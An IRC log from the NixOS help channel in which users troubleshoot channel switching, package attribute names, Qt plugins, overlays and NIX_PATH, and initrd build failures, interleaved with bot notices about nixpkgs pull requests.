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<siraben> nekroze: warning: unable to download 'https://nixos.org/channels/nixos-unstable': Couldn't resolve host name (6); retrying in 259 ms
<siraben> Ok 2 symlinks created
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<nekroze> siraben: sounds like your dns is borked
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<siraben> nekroze: never mind it works
<siraben> But still
<siraben> "warning: Nix search path entry '$HOME/.nix-defexpr/channels' does not exist, ignoring"
<siraben> That doesn't sound good
<samueldr> it can be correct
<siraben> I'm trying to switch to nixos-unstable
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<siraben> And something broke along the way
<samueldr> it would be if your user doesn't have a channel "updated"
<samueldr> it's after all, a warning
<siraben> If I run "sudo nix-channel --update" I get warning: Nix search path entry '$HOME/.nix-defexpr/channels' does not exist, ignoring
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<samueldr> siraben: there have been reports that sudo may be starting to cause issues with the environment with unstable
* samueldr should try upgrading a machine to test
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<siraben> So do I change back to stable?
<siraben> Because I can't rebuild my system now
<samueldr> siraben: use `sudo -i nix-channel --update ; sudo -i nixos-rebuild`
<samueldr> ah, missed the boot/switch to rebuild
<iqubic> How does nix work when you make an executable with the nix shebang?
<nekroze> why not just "sudo nixos-rebuild switch --upgrade" ?
<nekroze> iqubic: well
<samueldr> nekroze: right, that too would have worked :/
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<siraben> Ok rebuilding seems to affect my wifi
<siraben> Strange
<siraben> Still errors
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<siraben> Apologies, I've switched to another computer because I was disconnecting all the time on the nixos machine
<samueldr> what's the output of `sudo nix-channel --list; sudo -i nix-channel --list` (if they differ)?
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<siraben> samueldr: Both are the same
<samueldr> ah!
<iqubic> Oh. Why are you using unstable?
<siraben> Because I want libreoffice 6.0 and emacs 26.1
<samueldr> siraben: I believe the channel name (on the left) should have been nixos
<samueldr> though I'm unsure
<nekroze> siraben: I believe that samueldr is correct that it must be called nixos
<samueldr> yeah, pretty much confirmed
<iqubic> How do you change the name of the channel?
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<siraben> You delete it first
<siraben> And add it again
<nekroze> iqubic: it is set as the final parameter when you add it
<nekroze> iirc
<samueldr> when you --add a channel, if you don't give a specific name (like you probably did) it would be named by dropping the part right to the hyphen
<samueldr> nekroze: yes
<iqubic> siraben: Did you ever manage to get emacs installed/
<samueldr> (I use a git checkout on my machines, so it's a bit harder to be 100% sure)
<samueldr> siraben: does it work with the channel named "nixos" ?
<siraben> iqubic: Yeah it was easy
<siraben> nix-env -i emacs
<siraben> But I have a lot of issues with wireless
<{^_^}> [nixpkgs] @volth opened pull request #43990 → fix build with allowAliases=false → https://git.io/fNl2l
<siraben> nixos-rebuild switch is saying that "texlive-combined-full" is an undefined variable
<siraben> In my configuration.nix
<siraben> Despite texlive-combined-full being a valid package name, correct?
<nekroze> siraben: unlikely, nixos.texlive-combined-full might be though
<nekroze> sorry I meant pkgs.texlive-combined-full
<siraben> But isn't the whole thing wrapped in environment.systemPackages = with pkgs; [ ... texlive-combined-full ]; ?
<samueldr> siraben: that's the name = "" of a package, but not the attribute name it seems
<siraben> How do I install libreoffice-fresh?
<samueldr> try [pkgs.]texlive.combined.scheme-full
<siraben> It says doesn't match derivations
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<samueldr> siraben: how did you try installing it, as a systemPackage or using nix-env?
<siraben> nix-env
<samueldr> using -i libreoffice-fresh I presume?
<siraben> So in nix-env -i <name> the <name> is not the same as what I would put in my configuration.nix?
<samueldr> try -iA nixos.libreoffice-fresh
<samueldr> no
<samueldr> ,-A
<{^_^}> You'll usually want to use nix-env -i with -A. It's faster and more precise. See https://nixos.wiki/wiki/FAQ/nix-env_-iA for details.
<siraben> If it's so good why not make it default lol
<samueldr> you'll want the attribute name from the pkgs attrset
<samueldr> I don't know!
<samueldr> though, AFAIK, -A only works for *installation*
<samueldr> removal still works using the name attribute of a package
<samueldr> > pkgs.libreoffice-fresh.name
<{^_^}> "libreoffice-"
<siraben> Hm ok.
<siraben> building the system configuration...
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<{^_^}> [nixpkgs] @peti pushed to haskell-updates « hackage-packages.nix: automatic Haskell package set update »: https://git.io/fNl2V
<{^_^}> [nixpkgs] @matthewbauer closed pull request #39580 → Implement standardized "use flags" for Nixpkgs → https://git.io/vpl4u
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<{^_^}> [nixpkgs] @ysndr opened pull request #43991 → solaar: add unreleased but supported master branch version → https://git.io/fNl2P
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<lostman> is there a way to pass individual files to `src` in `mkDerivation`? I would like to pick specific files and directories from `./.` rather than passing it all
<{^_^}> [nixpkgs] @dtzWill closed pull request #43986 → travis-conditions: init at 1.0.2 → https://git.io/fNluk
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<samueldr> there may be helpers already made building on top of filterSource to help you, too
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<justan0theruser> are there methods to secure these builds? Do any nix packages have gitian builds?
<justan0theruser> or some method of verifying that amazon isn't having me run malicious code
<siraben> Building libreoffice from source is fun
<siraben> Can I decide to move back to the stable branch from unstable later?
<Jason_Grossman> siraben: Yes, AND ...
<Jason_Grossman> ... since (almost) everything is declarative, it's a safe switch, unlike most OSes.
<siraben> wow wee!
<Jason_Grossman> Yep.
<siraben> So what do I type into the terminal?
<Jason_Grossman> Change to the stable channel (see the manual) and then update the channel and then sudo nixos-rebuild switch.
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<siraben> Seriously that's it, crazy.
<d1rewolf> siraben, nixos is crazy beautiful ;)
<siraben> Except if wifi didn't sporadically disconnect haha
<d1rewolf> siraben, sorry you're having that issue. I'm only a week into nixos, but I've got it on three machines and none have exhibited wifi problems (yet...knock on wood) :-)
<siraben> d1rewolf: I suspect it's due to macbook pro driver problems, I had some wifi issues on debian as well
<d1rewolf> siraben, ah...I have not done it on a mac yet
<siraben> So it looks like I won't be using Nixos much, but for my next computer I'll keep it in mind :)
<d1rewolf> but they seem to be troublemakers when it comes to linux based on what I've read in the past
<siraben> Actually it's still perfectly usable, if I can put up with wifi
<siraben> Hah, see the new macbook pros
<d1rewolf> siraben, what driver are you using?
<siraben> broadcom-sta
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<d1rewolf> siraben, me personally, I have bought macs at times over the years for reasons which really wouldn't hold water
<d1rewolf> I have always convinced myself through arguments that it was worth it
<d1rewolf> the two arguments I end up using (or have in the past) is 1. it will be easier for my family, and 2. I will develop some sort of iOS app and need it
<siraben> Everyone should be using GNU/Linux.
<d1rewolf> 1 has proven false, except for those cases where Apple applies significant peer pressure to your children to get them to use it (iMessage)
<d1rewolf> and 2...well, damn it. haven't yet ;)
<d1rewolf> siraben, I'm not sure it's for everyone, but I'll tell you that eliminating my 27inch iMac from my machine mix was one of the best decisions I've made
<d1rewolf> right behind switching to nixos and finally committing to use i3 ;)
<siraben> Well it's because it uses ethernet
<jackdk> I bought a mac laptop once, thinking I'd give the ios thing a go. then the (later rolled back) language restrictions for app store apps came out and i drew the line
<siraben> d1rewolf: I tried to push people to use Signal
<d1rewolf> siraben, what uses ethernet?
<siraben> d1rewolf: Your iMac?
<siraben> Oh you eliminated it
<d1rewolf> right ;)
<siraben> I thought you installed NixOS on it and said it was a good thing
<siraben> haha
<d1rewolf> lol
<d1rewolf> no
<d1rewolf> I removed it completely, and now use my dell 5520 laptop with a 43-inch 4k monitor
<d1rewolf> which happens to be a $279 4k tv
<d1rewolf> whcih happens to be freaking amazing for that price
<d1rewolf> tcl 43s405. honestly the best display I've ever had
<jackdk> what's the latency like on the tv? I have been thoroughly disappointed by most modern tvs
<d1rewolf> has chrome 4:4:43
<d1rewolf> er
<d1rewolf> chroma 4:4:4
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<nikki93> trying to decide if i should get hidpi on my next laptop -- what do y'all think?
<nikki93> is it annoying to work well w/?
<d1rewolf> nikki93, not bad once you get used to it
<nikki93> mostly going to only use laptop but occasionally will hook up to external display
<d1rewolf> I have a dell 5520 15-inch with 4k
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<nikki93> d1rewolf: nice -- do you use X or wayland?
<d1rewolf> just need to adjust scaling when not docked
<d1rewolf> nikki93, I've tried both. still using X for now
<nikki93> does it understand your hidpi well
<d1rewolf> nikki93, depends on what desktop env i'm using
<nikki93> i'm mostly planning on using terminals for everything, maybe GUI emacs, and deciding which browser to use (considering luakit, surf, ...)
<nikki93> o was gonna use dwm or i3 or awesomewm or such
<d1rewolf> gnome has a scaling setting which works well. with i3, I just tweak ~/.Xresources
<d1rewolf> I'm currently running i3 on nixos on a 43-inch 4k and it's beautiful at full 4k res. on the 15-inch laptop, I typically scale down to 1080p
<{^_^}> [nixpkgs] @matthewbauer merged pull request #43990 → fix build with allowAliases=false → https://git.io/fNl2l
<{^_^}> [nixpkgs] @matthewbauer pushed 2 commits to master: https://git.io/fNlad
<nikki93> :D
<nikki93> d1rewolf: does it make sense to someohw put .Xresources contents in the nixos config
<nikki93> or do you just put it in ~/.Xresources
<tertle||eltret> mmm 4K
<d1rewolf> nikki93, I think it does make sense. However, I'm very new (two weeks) to nixos, so I'm gradually switching things over...
<tertle||eltret> i didnt know they make 4K that small
<nikki93> nice
<nikki93> i used arch for a while and am using mac now and thinking to go back to linux and excited to try nixos for that
<Yaniel> tiny pixels <3
<d1rewolf> tertle||eltret, at 15-inch, it's not worth it
<d1rewolf> too small
<d1rewolf> now, on the 43-inch display, it's........wonderful
<nikki93> d1rewolf: i was gonna do a 14 inch lappy with 2560x1440
<Yaniel> 4K at 24" is very nice at the distance I normally use it
<d1rewolf> nikki93, good luck. I would only pay the extra for 4k if you plan to use an external monitor (personally)
<nikki93> i have a 4k external monitor already
<nikki93> just was thinking that having hidpi on lappy would make it so i can go up and see more and still have it look good (i have good eyes i guess) @_@ hehe
<d1rewolf> then you should enjoy it
<nikki93> thx :D
<d1rewolf> nikki93, yes, as long as you can squint, you'll be good
<Yaniel> 4K on a laptop is a bit overkill I guess
<d1rewolf> but i3 or tiling managers I find are almost crucial to leveraging the extra space
<Yaniel> apple is pretty close to the ideal DPI with their 15" 2880x1800
<nikki93> definitely
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<nikki93> anyone here using a thinkpad x1 carbon 6th gen?
<nikki93> the one that came out in 2018
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<siraben> I don't think my GNOME shell is the most recent---how do I check?
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<tenten8401> I think there's an "About" thing in the settings
<tenten8401> for Gnome
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<siraben> Ok I'm trying to use GNOME 3.28
<siraben> I think services.xserver.displayManager.gdm.enable = true; is it, right?
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<d1rewolf> does nixos-container use docker, lxc or something else? and is it possible to run a gui environment easily in a container created by nixos-container?
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<Jason_Grossman> siraben: gdm is not gnome shell. gdm is gnome's greeter.
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<siraben> So does it replace the login screen?
<Jason_Grossman> Yes.
<Jason_Grossman> If you want.
<siraben> Ok.
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<siraben> Why is Deja Dup an older version?
<siraben> I can't restore from my encrypted backup
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<pie_> does anyone know how to get qt compiled with gif support? is it in qtfull vs qtbase?
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<{^_^}> [nixpkgs] @FRidh pushed to python-unstable « python.pkgs.apipkg: fix build »: https://git.io/fNlwn
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<{^_^}> [nixos-hardware] @rehno-lindeque opened pull request #68 → apple/macbookpro/11-5: init → https://git.io/fNlwl
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<pie_> how do i do something = import <...> {}; with a path in place of ...?
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<samueldr> pie_: you put the path instead of <...> :)
<pie_> its not happy with import /nix/var/nix/profiles/per-user/paprika/channels/unstable {};
<samueldr> > pkgs.path
<{^_^}> /var/lib/nixbot/state/nixpkgs
<samueldr> > import pkgs.path {}
<{^_^}> { AAAAAASomeThingsFailToEvaluate = <CODE>; AMB-plugins = <CODE>; AgdaSheaves = <CODE>; AgdaStdlib = <CODE>; CoinMP = <CODE>; DisnixWebService = <CODE>; EBTKS = <CODE>; EmptyEpsilon = <CODE>; Fabric = ...
<pie_> error: syntax error, unexpected '=', expecting $end, at /mnt/data/hask/bb/shell.nix:1:6
<pie_> ah wait, inb4 its because im not in a set
<samueldr> maybe
<samueldr> I was going to suggest that a syntax error is probably you're using the language wrong :)
<pie_> yeah ok i wasnt putting it in a let or anything
<pie_> fixed x)
<samueldr> because, as far as nix is concerned, <something> is a path, like ./. is a path
<samueldr> except that for <...> it uses a value from NIX_PATH
* pie_ hopes his hacked up build is gonna build
<samueldr> > <nixpkgs> == pkgs.path && <nixpkgs> == /var/lib/nixbot/state/nixpkgs
<{^_^}> true
<pie_> samueldr, aha
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<samueldr> you could NIX_PATH=foo=/bar and use <foo>
<pie_> i just added the stuff at the top https://bpaste.net/show/77889c0f5bde and the stb.qt59.full things
<pie_> samueldr, yeah it makes sense, thanks
<samueldr> if it's building under the user `paprika` you probably can import <unstable>
<pie_> ok yeah, i forgot this isnt my "use nix properly" machine
<samueldr> I'm glad I don't have such a machine ;)
<pie_> well build hasnt crashed and burned yet so, yaaaay
<kalbasit> hey guys, so I'm still trying to wrap my head around `mkIf`. I have this config that I import from inside of `configuration.nix` that depends on files existing at a specific path. Those files will not exist on my non-work machines or on new machines so I currenly have a `var = if pathExists then readFile else ""` but how can I surround all the `services.nginx... = ` with a check that the var is not empty? The file in question
<pie_> qtah: Using Qt 5.11.
<pie_> uhhhhhhhh....thats supposed to be qt59
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<pie_> so i messed up some overrides or something :x
<samueldr> unstable has 5.11 :)
<samueldr> your stdenv comes from unstable
<{^_^}> [nixpkgs] @NeQuissimus pushed 5 commits to master: https://git.io/fNlwS
<pie_> yeah, its gonna be a pain figuring out how patch this together...
<{^_^}> [nixpkgs] @NeQuissimus pushed to release-18.03 « linux: 4.4.142 -> 4.4.143 »: https://git.io/fNlwH
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<{^_^}> [nixpkgs] @NeQuissimus pushed to release-18.03 « linux: 4.9.113 -> 4.9.114 »: https://git.io/fNlw7
<{^_^}> [nixpkgs] @NeQuissimus pushed to release-18.03 « linux: 4.14.56 -> 4.14.57 »: https://git.io/fNlwF
<{^_^}> [nixpkgs] @NeQuissimus pushed to release-18.03 « linux: 4.17.8 -> 4.17.9 »: https://git.io/fNlwA
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<pie_> samueldr, i overrode librarytooldepends and librarysystemdepends so im not sure whats pulling it in
<samueldr> pie_: convert to callPackage call it like wireshark in all-packages.nix: https://gist.github.com/samueldr/58d4f8f626b0a1b4d02b3001c6254180
<pie_> if you look for qtah stuff in https://raw.githubusercontent.com/NixOS/nixpkgs/master/pkgs/development/haskell-modules/hackage-packages.nix those are the only things that seem to reference it
<samueldr> I mean, I don't have any experience packaging qt stuff, but generally, when things are versioned, they are done that way AFAIK
<pie_> i think this is more a haskell package thing
<infinisil> kalbasit: instead of `{ services.foo... = bar }` you do `{ config = mkIf condition { services.foo... = bar; }; }`
<pie_> well ill give it a shot
<kalbasit> infinisil: oh I see. and the `config =` will not override the actual config? it will just be merged with it?
<pie_> samueldr, at least for your example, it doesnt show how to use qtXX.full
<infinisil> kalbasit: indeed, the former syntax actually is just a shorthand for the latter
<pie_> im hoping qt full contains some libs im missing from qtbase :/
<samueldr> inside the wireshark derivation, it would be qt5.full
<kalbasit> infinisil: I see, thank you!
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<infinisil> :)
<pie_> samueldr, hm ok
<samueldr> though what I'm saying probably doesn't have much to do with what you're doing :/
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<pie_> aha!
<pie_> pretty sure i want qtimageformats
<pie_> if only i didnt need to wait for a really long rebuild every time x)
<samueldr> ,locate libqgif.so
<{^_^}> Found in packages: qt4, qt5.full, robomongo, qt5.qtbase.bin
<samueldr> (forget about robomongo)
<samueldr> the results aren't those I expected :)
<samueldr> pie_: in your terminal, use `nix-locate libqgif.so` though I'm unsure whether that's the one you need
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<pie_> yeah i want to try avoiding hacking it up that much
<pie_> ah cool command
<samueldr> nix-locate -r plugins/imageformats/.*so | grep -v '^('
<pie_> hmm that says it should be in qtbase
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<samueldr> yeah, THOUGH
<pie_> which is kind of strange since it didnt seem to be in mine
<samueldr> there *may* be issues with qt plugin paths depending on how you're using them
<pie_> well i did have to manuall set it
<samueldr> (and uh, it's possible there's a difference between stable and unstable)
* samueldr refreshes his index
<pie_> i've been using QT_PLUGIN_PATH = qt5.qtbase.bin + "/" + qt5.qtbase.qtPluginPrefix;
<samueldr> at run-time?
<pie_> in shell.nix
<pie_> it usually works
<samueldr> so yeah, probably fine at runtime
<samueldr> I was looking at the platforms issue where Qt cannot find libqxcb in some situations earlier
* pie_ waits for build of his mangled shell.nix to eventually finish, maybe it will just work
<pie_> samueldr, yeah that was a headscratcher for me when it came up, somehow i ended up on that snippet i just pasted and got it to work
<samueldr> yes, it feels a bit non-nixy how the Qt plugins system is still working under the hood
<samueldr> and I'm unsure whether my feeling is warranted or not
<pie_> afaik hte nixpkgs people have way too much trouble with qt
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<chrrles> what is the recommended way to stand up declarative Windows VMs?
<pie_> meanwhile, i guess i do have qgif, i was probably using the wrong part of the API (i thought it should just work with what i was doing)
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<samueldr> pie_: maybe strace what the process(es) are doing to see where they look for their image format plugins?
<pie_> it turns out i need to use QMovie to play gifs, plain old settin g a qlabel wont work :p
<{^_^}> [nixpkgs] @jtojnar opened pull request #43992 → Upstream sessions → https://git.io/fNlrV
<{^_^}> [nixpkgs] @matthewbauer pushed to staging « setup.sh: add HOST_PATH »: https://git.io/fNlri
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<Jason_Grossman> c
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<{^_^}> [nixpkgs] @carlosdagos opened pull request #43993 → cntlm: add support for darwin → https://git.io/fNlo6
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<{^_^}> [nixpkgs] @kalbasit opened pull request #43995 → neovim: fix the xsel path in the clipboard runtime provider → https://git.io/fNlK8
<kalbasit> can someone label the above PR as a bug?
<{^_^}> [nixpkgs] @samueldr opened pull request #43996 → refind: 0.11.2 -> 0.11.3 → https://git.io/fNlKw
<justan0theruser> if I want to make a backup, what directories do I need to guarantee I can go back to the state my file system would be at if I ran `sudo nixos-rebuild switch --upgrade`
<justan0theruser> anything other than /etc /var /boot /root /home ?
<samueldr> I think in /nix/var there are things you may want?
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<samueldr> depends on whether you want all the current state of your machine
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<kalbasit> in the definition of `nixPath` here https://github.com/NixOS/nixpkgs/blob/b43c4d8b758a3965067b24f3796cdd532756a2ce/nixos/modules/services/misc/nix-daemon.nix#L347-L352 I know what `nixpkgs` and `nixos-config` are, but do the rest do? and if I remove them, what would happen?
<kalbasit> s/but do/but what do/
<samueldr> » will cause Nix to look for paths relative to /home/eelco/Dev and /etc/nixos, in that order. It is also possible to match paths against a prefix. For example, the value
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<samueldr> so, <foo> will check $HOME/.nix-defexpr/channels/foo and /nix/var/nix/profiles/per-user/root/channels/foo
<kalbasit> ohh I see
<samueldr> in other words, your channel names are available in brackets
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<kalbasit> so in other words, since I submodule nixpkgs to my repo and control all overlays in the same repo, I should remove all references to channels and only leave the one `nixpkgs` and the `nixos-config`
<kalbasit> this should work gr8, hopefully :)
* samueldr just realised his own NIX_PATH is wrong :/
<samueldr> uh, I'm not sure
<{^_^}> [nixpkgs] @yrashk opened pull request #43997 → gitea: 1.4.2 -> 1.4.3 → https://git.io/fNl6o
<samueldr> but keeping those there shouldn't cause harm
<kalbasit> well, only a reboot will tell :)
<kalbasit> samueldr: well the other day I couldn't figure out why my system was out of date, it seems that it was favoring the `.nix-defexpr/channels` over my `nixpkgs` and the system was out of date
<kalbasit> so I used `-I nixpkgs=...` and it worked but still couldn't figure out why
<samueldr> ah
<kalbasit> this happened during first install
<samueldr> you're on unstable?
<kalbasit> yep
<kalbasit> oh I also had to `nix-channel --add ...`
<kalbasit> and `nix-channel --update`
<samueldr> I really need to test things out for whatever seems to happen with sudo
<samueldr> I don't think you need to help here :)
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<kalbasit> :)
<kalbasit> samueldr: I define `system-path` for the nixPath substitution
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<kalbasit> is it possible to make this variable available through all of my derivations? maybe in `config.system-path`?
* kalbasit have another question for you samueldr :)
<samueldr> I never had to reference paths anywhere in my ocnfigs
<samueldr> so uh, either I'm doing something right or doing something wrong :D
<kalbasit> lol
<kalbasit> I don't like hardcoded paths, allergic to that lol
<samueldr> I have this, my nixpkgs checkout is at /etc/nixos/nixpkgs
<kalbasit> and I already have another file doing hardcoded stuff
<samueldr> I don't have hardcoded paths either
<kalbasit> oh I see
<samueldr> everything is relative
<kalbasit> me too but one is seems to be breaking `nox review pr ##`: https://github.com/kalbasit/system/blob/master/overlays/neovim/default.nix#L19
<samueldr> *that's where I forgot to re-add $HOME/whatever to the nix path 😩
<kalbasit> the best tool for code review, is to explain your code :)
<samueldr> I start writing a gist with hard questions, or a discourse post, and then end up cancelling the post and answering myself :S
<kalbasit> yep :)
<kalbasit> ok final question: so I currenly have overlays at https://github.com/kalbasit/system/tree/master/overlays so I have to `ln -s <system> ~/.config/nixpkgs` where system is where the repo is cloned. How can I avoid this symlink?
<kalbasit> it sucks to have to create it just so I can bootstrap a new machine
<samueldr> hah!
<samueldr> I have a weird trick because I too didn't like the duplication
<samueldr> this is also explained here: https://nixos.wiki/wiki/Overlays#Using_nixpkgs.overlays_from_configuration.nix_as_.3Cnixpkgs-overlays.3E_in_your_NIX_PATH
<samueldr> I have been given a possibly better solution to this... but haven't tried it yet :/
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<kalbasit> oh so it's the `nixpkgs-overlays` that controls where they are located?
<samueldr> the conversation where I was offered an alternative solution: https://logs.nix.samueldr.com/nixos/2018-06-25#1529954932-1529955354;
<samueldr> » Otherwise, if the Nix path entry <nixpkgs-overlays> exists, we look for overlays at that path, as described below.
<samueldr> See the section on NIX_PATH in the Nix manual for more details on how to set a value for <nixpkgs-overlays>.
<samueldr> it's 2 out of the three locations it will check
<kalbasit> thank you, I'll go read :)
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<samueldr> what this will do, is it will take your config, get the `nixpkgs.overlays` values that you have set
<samueldr> so all your overlays are now set inside your nixos configuration, the overlays-compat reads your config to get the values
<kalbasit> oh so you have an indirection through the overlays-compact to load the actual overlay folders?
<kalbasit> :)
<samueldr> hum not really, what it does is it uses *that* value to set it in NIX_PATH so it works elsewhere than in nixos-rebuild
<samueldr> so you will need those
<samueldr> but nowhere else you will need to refer to those
<samueldr> (so, no symlink in .config)
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<kalbasit> ok let me try, if I can replicate what you have done :)
<kalbasit> I just applied your hack and removed the symlink, I rebuilt `neovim-unwrapped` and my fix was there!!
<kalbasit> samueldr: when I removed https://github.com/kalbasit/system/blob/26fe339d684f616ef3840556b9526df5c4239cbe/machines/imports/common.nix#L14-L19 `nixos-rebuild test` failed because it could not find `rbrowser`, a package added by an overlay
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<kalbasit> also my user couldn't find the all derivation
<kalbasit> so it did not work :(
<samueldr> yeah, my main issue with overlays at first was how I couldn't nix-env -iA some-new-attribute (for something that didn't make sense to be in systemPackages)
<kalbasit> samueldr: does this hack requires overlays at `/etc/nixos/overlays`?
<samueldr> not at all
<kalbasit> with the symlink to `~/.config/nixpkgs` I was able to `nix-env -i all`
<kalbasit> but now I can't
<samueldr> btw, when I'm building something for a PR, I use `nix-verify` which acts just like nix-build, but purifies the env a bit more https://gist.github.com/samueldr/35929e83255642cea10990bbf18f5690
<samueldr> kalbasit: check whether your NIX_PATH is right in your shell
<samueldr> may need a login/source of appropriate profile files?
<samueldr> to "be right" in that case would be to have nixpkgs-overlays in there
<kalbasit> oh let me try that
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<kalbasit> samueldr: what argument do you pass to `nix-verify`?
<samueldr> same I would to nix-build
<samueldr> see the last line, it passes verbatim all arguments to nix-build
<kalbasit> `rror: getting status of '/home/kalbasit/code/personal/base/src/github.com/kalbasit/system/test': No such file or directory`
<samueldr> it "only" clears up the environment
<samueldr> did you `nix-verify test`?
<kalbasit> yea and I think because NIX_PATH is not inherited down, it does not find my nixpkgs or nixos-config
<kalbasit> yea
<samueldr> ah
<samueldr> do note that this is strictly a `nix-build` replacement, nix-build wouldn't have worked there, would it?
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<samueldr> what I'm thinking about is cases where e.g. you're updating something in nixpkgs, you cd ~/nixpkgs (or whatever) and then `nix-build -A attrpath` like `nix-build -A hello`
<kalbasit> samueldr: `nix-build '<nixpkgs>' -A pet` this works for me
<kalbasit> pet is coming from an overlay
<kalbasit> oh I see
<samueldr> yeah, maybe I wasn't clear enough, that's so I don't get overlays
<kalbasit> let me try that
<samueldr> only "pure" nixpkgs for nix-build
<kalbasit> I see, got it!
<kalbasit> that's actually pretty good, thank you
<samueldr> made it after accidentally shipping a wrong update to a package I maintain
<samueldr> the one in my overlays worked fine though!
<kalbasit> yea this really helps, I'll do the same
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<kalbasit> samueldr: the overlay hack did not work at all, I had to revert :(
<kalbasit> samueldr: did I miss something in the hack setup? https://github.com/kalbasit/system/commit/f94d6dfb1ae8bd451557fec013221bc4c1cdc3a5
<samueldr> I can't really tell, but at a glance it looks fine
<{^_^}> [nixpkgs] @vbgl merged pull request #43988 → mupdf: fix on darwin → https://git.io/fNlgZ
<{^_^}> [nixpkgs] @vbgl pushed commit from @veprbl to master « mupdf: fix on darwin »: https://git.io/fNlPm
<samueldr> it depends though what the NIX_PATH ends up looking like
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<samueldr> I'm sorry though, going to sleep, here it's 2:15
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<kalbasit> samueldr: good night dude, thx for your help!
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<{^_^}> [nixops] @domenkozar merged pull request #924 → nixops script: Remove top-level Exception catch-all. → https://git.io/vpvT3
<{^_^}> [nixops] @domenkozar pushed 2 commits to master: https://git.io/fNlPB
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<{^_^}> [nixpkgs] @periklis opened pull request #43998 → elpa: fix evaluation → https://git.io/fNlXO
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<{^_^}> Channel nixos-18.03-small advanced to https://github.com/NixOS/nixpkgs/commit/dea932eabf3 (from 4 hours ago, history: https://channels.nix.gsc.io/nixos-18.03-small)
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<sphalerite> Anybody got an example VM guest config with virtualbox shared folders that I could take some "inspiration" from?
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<sphalerite> Also, I want to include my configuration.nix in the virtual machine (building using nixos/modules/virtualisation/virtualbox-image.nix) so that I can keep it up-to-date without rebuilding the image. What's the best way to do this?
<{^_^}> [nix] @edolstra merged pull request #2302 → prim_foldlStrict: call forceValue() before value is copied → https://git.io/fNWBp
<{^_^}> [nix] @edolstra pushed 2 commits to master: https://git.io/fNl19
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<{^_^}> [nixpkgs] @vbgl merged pull request #43635 → ocaml-4.07: 4.07.0+rc1 -> 4.07.0 → https://git.io/fNOFm
<{^_^}> [nixpkgs] @vbgl pushed to master « ocaml-4.07: 4.07.0+rc1 -> 4.07.0 »: https://git.io/fNlMe
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<elvishjerricco> Is it possible to tell Hydra to copy the build time closure of jobs to the cache, not just the runtime closure?
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<domenkozar> FRidh: seems like the only failures in staging are python related
<{^_^}> [nixpkgs] @Synthetica9 opened pull request #44000 → circleci-cli: 2018-05-12 -> 0.1.0 → https://git.io/fNlMF
<domenkozar> or at least mostly :)
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<sphalerite> Ouch. I was booting nixos off a USB stick, turns out suspending with that isn't a good idea if you have multiple USB sticks plugged in
<sphalerite> on wakeup, the device nodes seem to be rearranged sometimes and if they're swapped out the filesystem gets very confused
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<sphalerite> at least that's what I think happened here
<sphalerite> s/swapped out/swapped around/
<ckauhaus> heh
<{^_^}> [nixpkgs] @adisbladis pushed to master « emacsPackagesNg.elpaPackages: Don't pass fetchurl to elpa.nix »: https://git.io/fNlDk
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<{^_^}> [nixpkgs] @adisbladis closed pull request #43998 → elpa: fix evaluation → https://git.io/fNlXO
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<epta> domenkozar: hi. Wasn't there any issue with haskell libs being shadowed that you were investigating last week? I believe I saw some ticket, but cannot find it now
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<epta> I've just opened https://github.com/NixOS/nixpkgs/issues/44001 and curious is it something known
<{^_^}> #44001 (by dmalikov, open): Referencing source dependencies lead to shadowed dependency error
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<domenkozar> epta: yes, it's fixed in staging-next branch
<domenkozar> I hope we can merge today
<{^_^}> [nixpkgs] @FRidh pushed to staging-next « python.pkgs.pytest-flake8: disable test, fix build »: https://git.io/fNlyt
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<{^_^}> [nixpkgs] @FRidh pushed to staging « python.pkgs.pytest-flake8: disable test, fix build »: https://git.io/fNlyY
<FRidh> domenkozar: ^ that should fix most of it I think
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<domenkozar> tnx!
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<FRidh> a lot of the failures are arm though
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<manveru> anyone got some info about the state of secrets management via nixos?
<vaibhavsagar> manveru: I don't think there's been any change
<manveru> so you still set a string with a path to a file to read at runtime?
<vaibhavsagar> if you use `toString` religiously, then it sort of works
<vaibhavsagar> otherwise you have secrets in /nix/store/
<manveru> ok
<bkchr[m]> dtz: are you available?
<bkchr[m]> I have your problem: https://github.com/NixOS/nixpkgs/issues/43650 on master
<{^_^}> #43650 (by dtzWill, closed): staging can't build any NixOS test VM's? (extra-utils references libidn2 unexpectedly?)
<Dezgeg> I thought I saw a fix for that
<Dezgeg> commit caccc40ad01c4159a5a627b17d3db12ac67fa252
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<bkchr[m]> Dezgeg: I don't see that for building a VM, I get this while building initrd for my machine
<Dezgeg> well it's the same initrd builder anyway
<Dezgeg> oh, but the commit is about libresolv but the issue about libidn2
<bkchr[m]> yeah
<Dezgeg> I guess there is a new problem then
<bkchr[m]> yeah
<bkchr[m]> okay
<bkchr[m]> maybe because I use cyptsetup?
<Dezgeg> doubt so since it happens on every config: https://hydra.nixos.org/job/nixos/trunk-combined/tested#tabs-constituents
<adisbladis[m]> I just hit that one too and I'm not using luks at all
<bkchr[m]> ohh okay
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<{^_^}> [nixpkgs] @dotlambda pushed to python-unstable « python.pkgs.flake8: allow newer versions of pycodestyle and pyflakes »: https://git.io/fNlQg
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<bkchr[m]> adisbladis: hmm, any idea?
<bkchr[m]> Can I build initrd with nix-build?
<adisbladis[m]> Reverting `1af33e1aea62db65447c9b1c077ad1d26717564b` solves the issue for me
<adisbladis[m]> bkchr: ^
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<adisbladis[m]> Or at least I think so :)
<Dezgeg> I don't have that commi
<adisbladis[m]> Still building
<sphalerite> bkchr[m]: nix-build '<nixpkgs/nixos>' -A config.system.build.initrd
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<adisbladis[m]> Oh sorry
<bkchr[m]> I also don't have this commit
<adisbladis[m]> I cut of a char `f1af33e1aea62db65447c9b1c077ad1d26717564b`
<{^_^}> [nixpkgs] @dotlambda pushed 4 commits to python-unstable: https://git.io/fNl59
<bkchr[m]> adisbladis: the new one does not exist :D
<bkchr[m]> For the old commit id, I could at least find the commit on github
<adisbladis[m]> Bah.. :P My copy paste screwed up again... `f1a14f98446c0d65152542eb1196c4112cce843a`
<adisbladis[m]> Anyway.. This PR https://github.com/NixOS/nixpkgs/pull/43683
<{^_^}> #43683 (by dtzWill, closed): Revert "unixtools: link instead of copying"
<adisbladis[m]> I'll re-open if my rebuild works
<adisbladis[m]> dtz: ^
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<{^_^}> [nix] @edolstra merged pull request #2303 → parser.y: fix assoc of -> and < > <= >= → https://git.io/fNW6H
<{^_^}> [nix] @edolstra pushed 3 commits to master: https://git.io/fNldy
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<{^_^}> [nixpkgs] @alyssais opened pull request #44003 → Add missing semicolon to weechat example → https://git.io/fNlFk
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<Izorkin> how-to replace default function callPackage to custom? https://pastebin.com/Ycpk8yKY Need called pkgs.packname with callPackage = pkgs.lib.callPackageWith (pkgs // self);
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<adisbladis[m]> Nope. Didn't solve the issue :(
